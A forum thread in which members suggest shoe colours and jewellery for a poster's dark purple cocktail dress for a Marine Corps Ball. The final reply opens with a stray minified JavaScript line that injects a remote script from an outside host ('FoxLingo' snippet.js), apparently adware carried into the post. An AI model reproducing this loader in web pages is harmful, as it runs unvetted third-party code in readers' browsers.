Need some fashion advice about shoes/cocktail dress

margecat

Mentor
Staff Member
Mentor
Purraise
The Marine Corps Ball is coming up in early November. You are supposed to wear very formal everning gowns.  However, this particular ball I attend doesn't, so, this year, I'm wearing a street-length cocktail dress.

Here's a pic from eBay (I actually bought it elsewhere):

http://www.ebay.com/itm/new-nwt-eva...4450?pt=US_CSA_WC_Dresses&hash=item2a225f1a62

It's a darker purple than the pic, but the same exact dress.  It's a polyester jersey/knit/soft/drapey fabric--very nice.

I plan to wear my Nicky Butler sterling, amethyst, turquoise, rhodolite garnet, and ruby Indian Raj necklace with it. 

My question is: what color shoes should I wear? I'd like a strappy, high-heel sandal. Someone in the store suggested metallic silver. I always end up wearing boring, black shoes. Any suggestions? Thanks!

sk_pacer

TCS Member
Top Cat
Purraise
I would suggest strappy blackk sandals with bling and ditch the turquiose - it doesn't look great with purple (don't ask) and get an Austrian crystal choker with a pendant and earrings to match or fresh water pearls. Neither are expensive and look good. .

• Thread Starter Thread Starter

margecat

Mentor
Staff Member
Mentor
Purraise
Thank you for your advice, but I will wear the necklace. It's mostly amythest anyway. Also, I can't wear costume jewelry (metal allergy), and dislike Austrian crystal.  And chokers look AWFUL on my neck--and I can't stand anything tight on my neck. The necklace looks beautiful next to this dress. It really coordinates with it. 

Last edited:

sk_pacer

TCS Member
Top Cat
Purraise
I tried some of my turquoise with dark purple and it looked dreadful but I do like the look of freshwater pearls with dark dresses or tops. I also wasn't talking custume stuff, I can't wear it eitherl so my crystal is good stuff from a propler jewellers, not department store specials.

So what colour do YOU turn before the cheap metal starts making you itch? Cheap stuff goes green on me then the blisters start!!!LOL

• Thread Starter Thread Starter

margecat

Mentor
Staff Member
Mentor
Purraise
I tried some of my turquoise with dark purple and it looked dreadful but I do like the look of freshwater pearls with dark dresses or tops. I also wasn't talking custume stuff, I can't wear it eitherl so my crystal is good stuff from a propler jewellers, not department store specials.

So what colour do YOU turn before the cheap metal starts making you itch? Cheap stuff goes green on me then the blisters start!!!LOL
My fingers turn black, and itch, but it's really my neck and pierced ears that I have trouble with. They don't turn color, but I get a raised, bumpy, itchy rash on my necks, the piercings bleed and ooze lots of pus, and ITCH.  I have to wear sterling silver or 14k gold (or higher). It's a great excuse to buy the more expenive stuff! 

Here's a pic of my necklace (don't worry, I didn't pay that for it--it's another Ebay bargain--a Christmas gift to myself last year):

(type in "Nicky Butler Raj ruby amethyst and gemstone sterling silver necklace". You'll get to the HSN site.  I tried to embed it, but, when I clicked on it here, HSN showed me vacuum cleaners!)

The pearls you suggested would look great, too, but I'm kind of bored with pearls now, after wearing them so much for so many years. I guess I just want some big, gaudy jewelry nowadays! LOL

Last edited:

AbbysMom

At Abby's beck and call
Staff Member
Purraise
I think silver or black scrappy sandals would look good. :)

nurseangel

TCS Member
Veteran
Purraise
I think the silver would be pretty.  I bought gold strappy sandals to go with an evening dress I planned to wear on a cruise.  I would have never chosen them, except the evening dress had subtle gold threads here and there in the material.  Somehow, the shoes turned out to look good with every dress I packed. 

capt_jordi

TCS Member
Top Cat
Purraise
I'd go silver or black strappy shoes (not wedges, they are too casual) or a pair of pumps. Either classic black or maybe something with a little detail

swampwitch

TCS Member
Top Cat
Purraise
Your dress is such a dark purple and the necklace has such dark bright jewel tones, so I'd definitely go with a strappy shoe in another jewel tone from the necklace. Hear me out... A purple dress with "red" shoes doesn't sound great at first but could really work. Your dress is very dark, almost a neutral, so you can use another deep color for your shoes and they would draw the eye up from your shoes to really make the colors in your necklace pop!

I didn't see a link for the necklace but looked it up anyway, and it's gorgeous. I agree that silver sandals would work, but they won't be anything striking or interesting. I'd really go with garnet or ruby sandals, very strappy so they aren't not a big block of color. All the jewel tones are gorgeous together (as your necklace shows) and ruby and amethyst are gorgeous together. The shoes and necklace would tie in, and put the focus on your face.  
 Pretty dress, too, hope you have a blast at the Ball. 

Last edited:

natalie_ca

TCS Member
Top Cat
Purraise
!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}(); You're going to think me mad for saying this, but try on the dress with a dark red pump.

Silver would be ok too, but would you ever wear them again?  Best advise is to buy a pair of shoes that isn't a single dress specific, and that you will get further wear from.

You say you always wear boring black shoes.  Black shoes are anything but boring. They are very versatile and go with pretty much anything. You can't ever go wrong with a nice black shoe.